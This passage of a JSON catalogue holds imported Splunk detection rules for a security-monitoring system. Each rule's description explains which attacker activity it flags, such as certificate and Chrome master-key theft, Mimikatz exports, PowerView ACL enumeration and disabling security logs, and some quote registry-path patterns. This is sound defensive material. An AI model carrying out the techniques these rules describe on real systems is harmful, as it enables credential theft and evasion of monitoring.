persistence, and further post-exploitation. 
If confirmed malicious, this could allow attackers to maintain persistent access, execute arbitrary code, and potentially exfiltrate sensitive information from the compromised web server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-iis-components-add-new-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "38fe731c-1f13-43d4-b878-a5bbe44807e3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_iis_components_add_new_module.yml" } }, { "id": "splunk-security-content-391329f3-c14b-4b8d-8b37-ac5012637360", "type": "detection", "name": "Windows Steal Authentication Certificates Export PfxCertificate", "description": "The following analytic detects the use of the PowerShell cmdlet `export-pfxcertificate` on the command line, indicating an attempt to export a certificate from the local Windows Certificate Store. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant as it may indicate an attempt to exfiltrate authentication certificates, which can be used to impersonate users or decrypt sensitive data. 
If confirmed malicious, this could lead to unauthorized access and potential data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-steal-authentication-certificates-export-pfxcertificate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "391329f3-c14b-4b8d-8b37-ac5012637360", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_steal_authentication_certificates_export_pfxcertificate.yml" } }, { "id": "splunk-security-content-39405650-c364-4e1e-a740-32a63ef042a6", "type": "detection", "name": "Windows PowerView AD Access Control List Enumeration", "description": "The following analytic detects the execution of PowerView PowerShell cmdlets `Get-ObjectAcl` or `Get-DomainObjectAcl`, which are used to enumerate Access Control List (ACL) permissions for Active Directory objects. It leverages Event ID 4104 from PowerShell Script Block Logging to identify this activity. This behavior is significant as it may indicate an attempt to discover weak permissions in Active Directory, potentially leading to privilege escalation. 
If confirmed malicious, attackers could exploit these permissions to gain unauthorized access or escalate their privileges within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.002", "T1069" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powerview-ad-access-control-list-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "39405650-c364-4e1e-a740-32a63ef042a6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powerview_ad_access_control_list_enumeration.yml" } }, { "id": "splunk-security-content-395163b8-689b-444b-86c7-9fe9ad624734", "type": "detection", "name": "PaperCut NG Suspicious Behavior Debug Log", "description": "The following analytic identifies potential exploitation attempts on a PaperCut NG server by analyzing its debug log data. It detects unauthorized or suspicious access attempts from public IP addresses and searches for specific URIs associated with known exploits. The detection leverages regex to parse unstructured log data, focusing on admin login activities. This activity is significant as it can indicate an active exploitation attempt on the server. 
If confirmed malicious, attackers could gain unauthorized access, potentially leading to data breaches or further compromise of the server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/papercut-ng-suspicious-behavior-debug-log.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "395163b8-689b-444b-86c7-9fe9ad624734", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/papercut_ng_suspicious_behavior_debug_log.yml" } }, { "id": "splunk-security-content-395e50e1-2b87-4fa3-8632-0dfbdcbcd2cb", "type": "detection", "name": "AWS Successful Console Authentication From Multiple IPs", "description": "The following analytic detects an AWS account successfully authenticating from multiple unique IP addresses within a 5-minute window. It leverages AWS CloudTrail logs, specifically monitoring `ConsoleLogin` events and counting distinct source IPs. This behavior is significant as it may indicate compromised credentials, potentially from a phishing attack, being used concurrently by an adversary and a legitimate user. 
If confirmed malicious, this activity could allow unauthorized access to corporate resources, leading to data breaches or further exploitation within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1586", "T1535" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-successful-console-authentication-from-multiple-ips.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "395e50e1-2b87-4fa3-8632-0dfbdcbcd2cb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_successful_console_authentication_from_multiple_ips.yml" } }, { "id": "splunk-security-content-395ed5fe-ad13-4366-9405-a228427bdd91", "type": "detection", "name": "Windows Impair Defense Delete Win Defender Context Menu", "description": "The following analytic detects the deletion of the Windows Defender context menu entry from the registry. It leverages data from the Endpoint datamodel, specifically monitoring registry actions where the path includes \"*\\\\shellex\\\\ContextMenuHandlers\\\\EPP\" and the action is 'deleted'. This activity is significant as it is commonly associated with Remote Access Trojan (RAT) malware attempting to disable security features. 
If confirmed malicious, this could allow an attacker to impair defenses, facilitating further malicious activities such as unauthorized access, persistence, and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-delete-win-defender-context-menu.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "395ed5fe-ad13-4366-9405-a228427bdd91", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_delete_win_defender_context_menu.yml" } }, { "id": "splunk-security-content-396de86f-25e7-4b0e-be09-a330be35249d", "type": "detection", "name": "Windows MSExchange Management Mailbox Cmdlet Usage", "description": "The following analytic identifies suspicious Cmdlet usage in Exchange Management logs, focusing on commands like New-MailboxExportRequest and New-ManagementRoleAssignment. It leverages EventCode 1 and specific Message patterns to detect potential ProxyShell and ProxyNotShell abuse. This activity is significant as it may indicate unauthorized access or manipulation of mailboxes and roles, which are critical for maintaining email security. 
If confirmed malicious, attackers could export mailbox data, assign new roles, or search mailboxes, leading to data breaches and privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-msexchange-management-mailbox-cmdlet-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "396de86f-25e7-4b0e-be09-a330be35249d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_msexchange_management_mailbox_cmdlet_usage.yml" } }, { "id": "splunk-security-content-39c61d09-8b30-4154-922b-2d0a694ecc22", "type": "detection", "name": "Detect New Open S3 Buckets over AWS CLI", "description": "The following analytic detects the creation of open/public S3 buckets via the AWS CLI. It leverages AWS CloudTrail logs to identify events where a user has set bucket permissions to allow access to \"AuthenticatedUsers\" or \"AllUsers.\" This activity is significant because open S3 buckets can expose sensitive data to unauthorized users, leading to data breaches. 
If confirmed malicious, an attacker could gain unauthorized access to potentially sensitive information stored in the S3 bucket, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1530" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-new-open-s3-buckets-over-aws-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "39c61d09-8b30-4154-922b-2d0a694ecc22", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_new_open_s3_buckets_over_aws_cli.yml" } }, { "id": "splunk-security-content-39e2605a-90d8-11eb-899e-acde48001122", "type": "detection", "name": "PowerShell Start-BitsTransfer", "description": "The following analytic detects the execution of the PowerShell command `Start-BitsTransfer`, which can be used for file transfers, including potential data exfiltration. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events and command-line arguments. This activity is significant because `Start-BitsTransfer` can be abused by adversaries to upload sensitive files to remote locations, posing a risk of data loss. 
If confirmed malicious, this could lead to unauthorized data exfiltration, compromising sensitive information and potentially leading to further exploitation of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-start-bitstransfer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "39e2605a-90d8-11eb-899e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_start_bitstransfer.yml" } }, { "id": "splunk-security-content-39ebdc68-25b9-11ec-aec7-acde48001122", "type": "detection", "name": "Disable Security Logs Using MiniNt Registry", "description": "The following analytic detects a suspicious registry modification aimed at disabling security audit logs by adding a specific registry entry. It leverages data from the Endpoint.Registry data model, focusing on changes to the \"Control\\\\MiniNt\" registry path. This activity is significant because it can prevent Windows from logging any events to the Security Log, effectively blinding security monitoring efforts. 
If confirmed malicious, this technique could allow an attacker to operate undetected, making it difficult to trace their actions and compromising the integrity of security audits.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-security-logs-using-minint-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "39ebdc68-25b9-11ec-aec7-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_security_logs_using_minint_registry.yml" } }, { "id": "splunk-security-content-3a1d8f62-5b9c-4e7d-b8f3-9d6a8e2f5e1f", "type": "detection", "name": "Detect Web Access to Decommissioned S3 Bucket", "description": "This detection identifies web requests to domains that match previously decommissioned S3 buckets through web proxy logs. This activity is significant because attackers may attempt to access or recreate deleted S3 buckets that were previously public to hijack them for malicious purposes. 
If successful, this could allow attackers to host malicious content or exfiltrate data through compromised bucket names that may still be referenced by legitimate applications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-web-access-to-decommissioned-s3-bucket.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3a1d8f62-5b9c-4e7d-b8f3-9d6a8e2f5e1f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/detect_web_access_to_decommissioned_s3_bucket.yml" } }, { "id": "splunk-security-content-3a76d52f-a007-4a65-a37d-f313c2c83f31", "type": "detection", "name": "Windows Suspicious Named Pipe", "description": "The following analytic detects the creation of, or connection to, known suspicious named pipes.\nIt leverages Sysmon EventCodes 17 and 18 to identify known default pipe names used by malicious or suspicious tools; because it matches default names only, tooling configured with custom pipe names will not trigger it.\nIf confirmed malicious, this could allow an attacker to abuse these pipes to gain privilege escalation,\npersistence, C2 communications, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1559", "T1021.002", "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-suspicious-named-pipe.yaml", "quarantine_reason": "imported 
rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3a76d52f-a007-4a65-a37d-f313c2c83f31", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_suspicious_named_pipe.yml" } }, { "id": "splunk-security-content-3a91a212-98a9-11eb-b86a-acde48001122", "type": "detection", "name": "Windows Multiple Users Failed To Authenticate Using Kerberos", "description": "The following analytic identifies a single source endpoint failing to authenticate with 30 unique users using the Kerberos protocol. It leverages EventCode 4771 with Status 0x18, indicating wrong password attempts, and aggregates these events over a 5-minute window. This behavior is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain initial access or elevate privileges in an Active Directory environment. 
If confirmed malicious, this activity could lead to unauthorized access, privilege escalation, and potential compromise of sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-users-failed-to-authenticate-using-kerberos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3a91a212-98a9-11eb-b86a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_users_failed_to_authenticate_using_kerberos.yml" } }, { "id": "splunk-security-content-3a9a6806-16a8-4cda-8d73-b49d10a05b16", "type": "detection", "name": "Windows Mimikatz Crypto Export File Extensions", "description": "The following analytic detects the creation of files with extensions commonly associated with the Mimikatz Crypto module. It leverages the Endpoint.Filesystem data model to identify specific file names indicative of certificate export activities. This behavior is significant as it may indicate the use of Mimikatz to export cryptographic keys, which is a common tactic for credential theft. 
If confirmed malicious, this activity could allow an attacker to exfiltrate sensitive cryptographic material, potentially leading to unauthorized access and further compromise of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-mimikatz-crypto-export-file-extensions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3a9a6806-16a8-4cda-8d73-b49d10a05b16", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_mimikatz_crypto_export_file_extensions.yml" } }, { "id": "splunk-security-content-3b132a71-9335-4f33-9932-00bb4f6ac7e8", "type": "detection", "name": "Linux Deletion Of Cron Jobs", "description": "The following analytic detects the deletion of cron jobs on a Linux machine. It leverages filesystem event logs to identify when files within the \"/etc/cron.*\" directory are deleted. This activity is significant because attackers or malware may delete cron jobs to disable scheduled security tasks or evade detection mechanisms. 
If confirmed malicious, this action could allow an attacker to disrupt system operations, evade security measures, or facilitate further malicious activities such as data wiping, as seen with the acidrain malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-deletion-of-cron-jobs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3b132a71-9335-4f33-9932-00bb4f6ac7e8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_deletion_of_cron_jobs.yml" } }, { "id": "splunk-security-content-3b1d09a8-a26f-473e-a510-6c6613573657", "type": "detection", "name": "Windows Credentials from Password Stores Chrome LocalState Access", "description": "The following analytic detects non-Chrome processes accessing the Chrome \"Local State\" file, which contains critical settings and information. It leverages Windows Security Event logs, specifically event code 4663, to identify this behavior. This activity is significant because threat actors can exploit this file to extract the encrypted master key used for decrypting saved passwords in Chrome. If confirmed malicious, this could lead to unauthorized access to sensitive information, posing a severe security risk. 
Monitoring this anomaly helps identify potential threats and safeguard browser-stored data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credentials-from-password-stores-chrome-localstate-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3b1d09a8-a26f-473e-a510-6c6613573657", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credentials_from_password_stores_chrome_localstate_access.yml" } }, { "id": "splunk-security-content-3b4e18cb-497f-4073-85ad-1ada7c2107ab", "type": "detection", "name": "Windows Registry SIP Provider Modification", "description": "The following analytic detects modifications to the Windows Registry SIP Provider. It leverages Sysmon EventID 7 to monitor registry changes in paths and values related to Cryptography Providers and OID Encoding Types. This activity is significant as it may indicate an attempt to subvert trust controls, a common tactic for bypassing security measures and maintaining persistence. If confirmed malicious, an attacker could manipulate the system's cryptographic functions, potentially leading to unauthorized access, data theft, or other damaging outcomes. 
Review the modified registry paths and concurrent processes to identify the attack source.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-registry-sip-provider-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3b4e18cb-497f-4073-85ad-1ada7c2107ab", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_registry_sip_provider_modification.yml" } }, { "id": "splunk-security-content-3b6e1d36-6916-4eec-a7d5-bc98953ba595", "type": "detection", "name": "O365 Email Suspicious Search Behavior", "description": "The following analytic identifies when Office 365 users search for suspicious keywords or have an excessive number of queries to a mailbox within a limited timeframe. 
This behavior may indicate that a malicious actor has gained control of a mailbox and is conducting discovery or enumeration activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.002", "T1552" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-email-suspicious-search-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3b6e1d36-6916-4eec-a7d5-bc98953ba595", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_email_suspicious_search_behavior.yml" } }, { "id": "splunk-security-content-3b711292-9793-4a88-8e89-6e016cfbc09c", "type": "detection", "name": "Windows WinRAR Launched Outside Default Installation Directory", "description": "This Analytics detects the execution of WinRAR or RAR outside the default installation directory.\nThis behavior can be significant as it could indicate attempts to archive collected sensitive data from the endpoint for exfiltration.\nWe recommend reviewing the process path and the parent process path to determine if the execution is legitimate and if possible validate the data being archived.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-winrar-launched-outside-default-installation-directory.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3b711292-9793-4a88-8e89-6e016cfbc09c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_winrar_launched_outside_default_installation_directory.yml" } }, { "id": "splunk-security-content-3b8d2b4f-4e1e-4a9e-9b43-8a7a3a9c7e21", "type": "detection", "name": "Cisco Smart Install Oversized Packet Detection", "description": "This analytic detects oversized Cisco Smart Install (SMI) protocol messages by inspecting traffic to TCP port 4786\nwithin the Network_Traffic data model. Abnormally large SMI payloads have been associated with exploitation and\nprotocol abuse (e.g., CVE-2018-0171; activity reported by the \"Static Tundra\" threat actor). Monitoring message\nsizes over time can help identify possible attempts at remote code execution, denial of service, or reconnaissance\nagainst Cisco devices exposing Smart Install.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-smart-install-oversized-packet-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3b8d2b4f-4e1e-4a9e-9b43-8a7a3a9c7e21", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"detections/network/cisco_smart_install_oversized_packet_detection.yml" } }, { "id": "splunk-security-content-3bf5541a-6a45-4fdc-b01d-59b899fff961", "type": "detection", "name": "Detect Remote Access Software Usage File", "description": "The following analytic detects the writing of files from known remote access software to disk within the environment.\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on file path, file name, and user information.\nThis activity is significant as adversaries often use remote access tools like AnyDesk, GoToMyPC, LogMeIn, and TeamViewer to maintain unauthorized access.\nIf confirmed malicious, this could allow attackers to persist in the environment, potentially leading to data exfiltration, further compromise, or complete control over affected systems.\nIt is best to update both the remote_access_software_usage_exception.csv lookup and the remote_access_software lookup with any known or approved remote access software to reduce false positives and increase coverage.\nIn order to enhance performance, the detection filters for specific file names extensions / names that are used in the remote_access_software lookup.\nIf add additional entries, consider updating the search filters to include those file names / extensions as well, if not alread covered.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-remote-access-software-usage-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3bf5541a-6a45-4fdc-b01d-59b899fff961", "source_commit": "4d4c7ee", "license": "Apache-2.0", 
"license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_remote_access_software_usage_file.yml" } }, { "id": "splunk-security-content-3c49e5ed-625c-408c-a2c7-8e2b524efb2c", "type": "detection", "name": "Microsoft Intune DeviceManagementConfigurationPolicies", "description": "Microsoft Intune device management configuration policies are a tool administrators can use to remotely manage policies and settings on intune managed devices. This functionality can also be abused to disable defences & evade detection. This detection identifies when a new device management configuration policy has been created.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1072", "T1484", "T1021.007", "T1562.001", "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/microsoft-intune-devicemanagementconfigurationpolicies.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3c49e5ed-625c-408c-a2c7-8e2b524efb2c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/microsoft_intune_devicemanagementconfigurationpolicies.yml" } }, { "id": "splunk-security-content-3c6bd734-334d-4818-ae7c-5234313fc5da", "type": "detection", "name": "Kubernetes Create or Update Privileged Pod", "description": "The following analytic detects the creation or update of privileged pods in Kubernetes. It identifies this activity by monitoring Kubernetes Audit logs for pod configurations that include root privileges. 
This behavior is significant for a SOC as it could indicate an attempt to escalate privileges, exploit the kernel, and gain full access to the host's namespace and devices. If confirmed malicious, this activity could lead to unauthorized access to sensitive information, data breaches, and service disruptions, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-create-or-update-privileged-pod.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3c6bd734-334d-4818-ae7c-5234313fc5da", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_create_or_update_privileged_pod.yml" } }, { "id": "splunk-security-content-3cb56e57-5642-4638-907f-8dfde9afb889", "type": "detection", "name": "Windows AD Domain Root ACL Deletion", "description": "ACL deletion performed on the domain root object, significant AD change with high impact. Following MS guidance all changes at this level should be reviewed. 
Drill into the logonID within EventCode 4624 for information on the source device during triage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001", "T1484" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-domain-root-acl-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "3cb56e57-5642-4638-907f-8dfde9afb889", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_domain_root_acl_deletion.yml" } }, { "id": "splunk-security-content-3cc93f52-5aa6-4b7f-83b9-3430b1436813", "type": "detection", "name": "Cisco Secure Firewall - Malware File Downloaded", "description": "The following analytic detects file downloads that were classified as malware by Cisco Secure Firewall Threat Defense. It relies on the `SHA_Disposition` field with a value of \"Malware\" and includes metadata such as file name, file hash, and threat classification. This analytic is critical for surfacing file-based threats that are identified via Cisco's AMP or Threat Grid integrations. 
